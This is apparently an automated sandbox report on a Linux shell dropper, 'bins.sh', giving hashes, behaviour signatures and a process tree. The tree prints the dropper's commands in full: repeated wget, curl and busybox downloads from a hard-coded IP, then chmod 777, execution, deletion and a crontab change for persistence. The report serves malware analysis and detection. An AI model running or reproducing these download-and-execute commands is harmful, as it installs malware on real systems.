3d730bc9735ab25dad81eb452fbe24f699b20404f79b35328957eec76fdd6537

Analysis

max time kernel
149s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09/08/2024, 10:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

f58d1dc07ece41ca6d4c6c4b9773182e
SHA1

1043fbc66935e96d666e143bc0e0e0b95c2b63ed
SHA256

3d730bc9735ab25dad81eb452fbe24f699b20404f79b35328957eec76fdd6537
SHA512

c1d9b7a14ed7881716aad651d9995a74d00e3e58adb40fae6f7ed35dfcec7221b872c1597ec6c7a568010e57592668c913f02dcc5b218fb11dde133e182a03b2
SSDEEP

192:W8kdeLmhof43BGUgQBhTl8kdeLmqT3BQBhTC:W8kdeqhoftUgQBhTl8kdeqquBhTC

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 28 IoCs

Renames itself 1 IoCs

pid
1548

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.kcxfiB	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/168/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/89/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1127/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1488/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/3/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/473/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1567/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/182/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/570/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1159/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1284/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/11/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1641/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/17/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/81/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1593/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/2/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1557/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/5/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1019/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1149/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/8/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/445/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/624/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/464/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/516/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1145/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1688/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1702/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/27/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/28/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/98/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/170/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1335/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1696/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1354/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/21/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/180/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1143/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/323/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/420/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1662/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/79/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/542/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1192/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/18/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/20/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1115/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1580/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/12/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/13/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/16/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1613/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/80/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/172/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1189/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1556/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1681/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/35/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/164/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/1653/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/177/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
File opened for reading	/proc/462/cmdline	G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx

Writes file to tmp directory 64 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt	busybox
File opened for modification	/tmp/6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb	wget
File opened for modification	/tmp/2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm	wget
File opened for modification	/tmp/iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW	busybox
File opened for modification	/tmp/Vagi7meiueBttLimeY0QohYvyNii9y4zMR	curl
File opened for modification	/tmp/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c	wget
File opened for modification	/tmp/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW	busybox
File opened for modification	/tmp/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m	busybox
File opened for modification	/tmp/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt	curl
File opened for modification	/tmp/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c	busybox
File opened for modification	/tmp/jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs	wget
File opened for modification	/tmp/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO	busybox
File opened for modification	/tmp/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt	curl
File opened for modification	/tmp/G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx	wget
File opened for modification	/tmp/lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx	wget
File opened for modification	/tmp/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt	busybox
File opened for modification	/tmp/Vagi7meiueBttLimeY0QohYvyNii9y4zMR	busybox
File opened for modification	/tmp/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m	curl
File opened for modification	/tmp/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt	wget
File opened for modification	/tmp/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c	curl
File opened for modification	/tmp/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW	curl
File opened for modification	/tmp/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt	wget
File opened for modification	/tmp/ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI	busybox
File opened for modification	/tmp/iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW	curl
File opened for modification	/tmp/lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx	busybox
File opened for modification	/tmp/6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb	busybox
File opened for modification	/tmp/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW	busybox
File opened for modification	/tmp/G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx	wget
File opened for modification	/tmp/Vagi7meiueBttLimeY0QohYvyNii9y4zMR	wget
File opened for modification	/tmp/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW	wget
File opened for modification	/tmp/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO	busybox
File opened for modification	/tmp/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt	wget
File opened for modification	/tmp/jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs	busybox
File opened for modification	/tmp/Vagi7meiueBttLimeY0QohYvyNii9y4zMR	busybox
File opened for modification	/tmp/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c	wget
File opened for modification	/tmp/6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb	curl
File opened for modification	/tmp/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m	busybox
File opened for modification	/tmp/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m	wget
File opened for modification	/tmp/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt	busybox
File opened for modification	/tmp/G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx	curl
File opened for modification	/tmp/6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb	curl
File opened for modification	/tmp/2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm	busybox
File opened for modification	/tmp/ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI	wget
File opened for modification	/tmp/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW	wget
File opened for modification	/tmp/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt	wget
File opened for modification	/tmp/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c	busybox
File opened for modification	/tmp/iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW	curl
File opened for modification	/tmp/6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb	busybox
File opened for modification	/tmp/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c	curl
File opened for modification	/tmp/jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs	curl
File opened for modification	/tmp/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO	curl
File opened for modification	/tmp/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt	curl
File opened for modification	/tmp/G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx	busybox
File opened for modification	/tmp/iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW	busybox
File opened for modification	/tmp/Vagi7meiueBttLimeY0QohYvyNii9y4zMR	wget
File opened for modification	/tmp/2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm	curl
File opened for modification	/tmp/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW	curl
File opened for modification	/tmp/lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx	curl
File opened for modification	/tmp/Vagi7meiueBttLimeY0QohYvyNii9y4zMR	curl
File opened for modification	/tmp/ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI	wget
File opened for modification	/tmp/ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI	busybox
File opened for modification	/tmp/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO	curl
File opened for modification	/tmp/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m	wget
File opened for modification	/tmp/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:1487
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1489
- /usr/bin/wget
  wget http://37.44.238.75/bins/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  PID:1492
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  - Writes file to tmp directory
  PID:1502
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  - Writes file to tmp directory
  PID:1503
- /bin/chmod
  chmod 777 iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  PID:1504
- /tmp/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  ./iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  - Executes dropped EXE
  PID:1505
- /bin/rm
  rm iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  PID:1507
- /usr/bin/wget
  wget http://37.44.238.75/bins/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  - Writes file to tmp directory
  PID:1508
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  PID:1509
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  PID:1510
- /bin/chmod
  chmod 777 oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  PID:1511
- /tmp/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  ./oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  - Executes dropped EXE
  PID:1512
- /bin/rm
  rm oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://37.44.238.75/bins/lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx
  2⤵
  - Writes file to tmp directory
  PID:1515
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx
  2⤵
  PID:1516
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx
  2⤵
  PID:1517
- /bin/chmod
  chmod 777 lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx
  2⤵
  PID:1522
- /tmp/lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx
  ./lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx
  2⤵
  - Executes dropped EXE
  PID:1523
- /bin/rm
  rm lleJwlAImyqhwZhZbB4dwBpBt4quciaLIx
  2⤵
  PID:1525
- /usr/bin/wget
  wget http://37.44.238.75/bins/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m
  2⤵
  - Writes file to tmp directory
  PID:1526
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m
  2⤵
  - Writes file to tmp directory
  PID:1531
- /bin/chmod
  chmod 777 BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m
  2⤵
  PID:1532
- /tmp/BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m
  ./BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m
  2⤵
  - Executes dropped EXE
  PID:1533
- /bin/rm
  rm BOBYOkW9NldfT5hBXi13puYhvLpwLH5Z4m
  2⤵
  PID:1535
- /usr/bin/wget
  wget http://37.44.238.75/bins/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt
  2⤵
  - Writes file to tmp directory
  PID:1536
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt
  2⤵
  - Writes file to tmp directory
  PID:1538
- /bin/chmod
  chmod 777 gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt
  2⤵
  PID:1539
- /tmp/gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt
  ./gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt
  2⤵
  - Executes dropped EXE
  PID:1540
- /bin/rm
  rm gJ6oXExmNUtJlKPCezUadEGTjUqWrrQ4Yt
  2⤵
  PID:1542
- /usr/bin/wget
  wget http://37.44.238.75/bins/G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
  2⤵
  - Writes file to tmp directory
  PID:1543
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
  2⤵
  PID:1544
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
  2⤵
  PID:1545
- /bin/chmod
  chmod 777 G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
  2⤵
  PID:1546
- /tmp/G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
  ./G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  PID:1547
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:1549
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1550
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:1551
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:1552
- /bin/rm
  rm G7ulzVjYC59VOtF7T9QRQXEtGjH8ckO0Nx
  2⤵
  PID:1554
- /usr/bin/wget
  wget http://37.44.238.75/bins/iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW
  2⤵
  PID:1557
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW
  2⤵
  - Writes file to tmp directory
  PID:1561
- /bin/chmod
  chmod 777 iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW
  2⤵
  PID:1562
- /tmp/iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW
  ./iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW
  2⤵
  - Executes dropped EXE
  PID:1563
- /bin/rm
  rm iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW
  2⤵
  PID:1564
- /usr/bin/wget
  wget http://37.44.238.75/bins/6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb
  2⤵
  PID:1565
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb
  2⤵
  - Writes file to tmp directory
  PID:1566
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb
  2⤵
  - Writes file to tmp directory
  PID:1567
- /bin/chmod
  chmod 777 6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb
  2⤵
  PID:1568
- /tmp/6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb
  ./6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb
  2⤵
  - Executes dropped EXE
  PID:1569
- /bin/rm
  rm 6mXYDuVjkYQ1THGXik9a0pAAofy3U2Zedb
  2⤵
  PID:1571
- /usr/bin/wget
  wget http://37.44.238.75/bins/Vagi7meiueBttLimeY0QohYvyNii9y4zMR
  2⤵
  - Writes file to tmp directory
  PID:1572
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/Vagi7meiueBttLimeY0QohYvyNii9y4zMR
  2⤵
  - Writes file to tmp directory
  PID:1573
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/Vagi7meiueBttLimeY0QohYvyNii9y4zMR
  2⤵
  - Writes file to tmp directory
  PID:1574
- /bin/chmod
  chmod 777 Vagi7meiueBttLimeY0QohYvyNii9y4zMR
  2⤵
  PID:1575
- /tmp/Vagi7meiueBttLimeY0QohYvyNii9y4zMR
  ./Vagi7meiueBttLimeY0QohYvyNii9y4zMR
  2⤵
  - Executes dropped EXE
  PID:1576
- /bin/rm
  rm Vagi7meiueBttLimeY0QohYvyNii9y4zMR
  2⤵
  PID:1578
- /usr/bin/wget
  wget http://37.44.238.75/bins/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c
  2⤵
  - Writes file to tmp directory
  PID:1579
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c
  2⤵
  - Writes file to tmp directory
  PID:1580
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c
  2⤵
  - Writes file to tmp directory
  PID:1581
- /bin/chmod
  chmod 777 2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c
  2⤵
  PID:1582
- /tmp/2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c
  ./2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c
  2⤵
  - Executes dropped EXE
  PID:1583
- /bin/rm
  rm 2qwYcUyrntHY24EcShZNxGEQajLpAzKO5c
  2⤵
  PID:1585
- /usr/bin/wget
  wget http://37.44.238.75/bins/2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm
  2⤵
  PID:1586
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm
  2⤵
  - Writes file to tmp directory
  PID:1588
- /bin/chmod
  chmod 777 2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm
  2⤵
  PID:1589
- /tmp/2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm
  ./2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm
  2⤵
  - Executes dropped EXE
  PID:1590
- /bin/rm
  rm 2Bs8JFpFOqBiXgfSVDNolN4qmaxmtBrJlm
  2⤵
  PID:1592
- /usr/bin/wget
  wget http://37.44.238.75/bins/ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI
  2⤵
  - Writes file to tmp directory
  PID:1593
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI
  2⤵
  PID:1594
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI
  2⤵
  - Writes file to tmp directory
  PID:1595
- /bin/chmod
  chmod 777 ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI
  2⤵
  PID:1596
- /tmp/ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI
  ./ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI
  2⤵
  - Executes dropped EXE
  PID:1597
- /bin/rm
  rm ggIPjWoiO55CN4uLVMsA2oFwFP7Fau1TaI
  2⤵
  PID:1599
- /usr/bin/wget
  wget http://37.44.238.75/bins/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW
  2⤵
  - Writes file to tmp directory
  PID:1600
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW
  2⤵
  - Writes file to tmp directory
  PID:1601
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW
  2⤵
  - Writes file to tmp directory
  PID:1602
- /bin/chmod
  chmod 777 q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW
  2⤵
  PID:1603
- /tmp/q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW
  ./q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW
  2⤵
  - Executes dropped EXE
  PID:1604
- /bin/rm
  rm q24SnZsLiPrkf7mgfxxwiPjZ5o2OXBksEW
  2⤵
  PID:1605
- /usr/bin/wget
  wget http://37.44.238.75/bins/jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs
  2⤵
  - Writes file to tmp directory
  PID:1606
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs
  2⤵
  - Writes file to tmp directory
  PID:1607
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs
  2⤵
  - Writes file to tmp directory
  PID:1608
- /bin/chmod
  chmod 777 jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs
  2⤵
  PID:1609
- /tmp/jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs
  ./jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs
  2⤵
  - Executes dropped EXE
  PID:1610
- /bin/rm
  rm jOjCsc6Lb1rfzqKpKE3ERtlNUMhVHKezYs
  2⤵
  PID:1612
- /usr/bin/wget
  wget http://37.44.238.75/bins/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  PID:1613
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  - Writes file to tmp directory
  PID:1614
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  - Writes file to tmp directory
  PID:1615
- /bin/chmod
  chmod 777 iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  PID:1616
- /tmp/iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  ./iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  - Executes dropped EXE
  PID:1617
- /bin/rm
  rm iR8yH0i1CmTagbpd5LAkUyKPelq5OSIWoO
  2⤵
  PID:1619
- /usr/bin/wget
  wget http://37.44.238.75/bins/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  - Writes file to tmp directory
  PID:1620
- /usr/bin/curl
  curl -O http://37.44.238.75/bins/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  - Writes file to tmp directory
  PID:1621
- /bin/busybox
  /bin/busybox wget http://37.44.238.75/bins/oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  - Writes file to tmp directory
  PID:1622
- /bin/chmod
  chmod 777 oFcmE1FgKhne42UgV8PwFKEfPr8uhc21Zt
  2⤵
  PID:1623
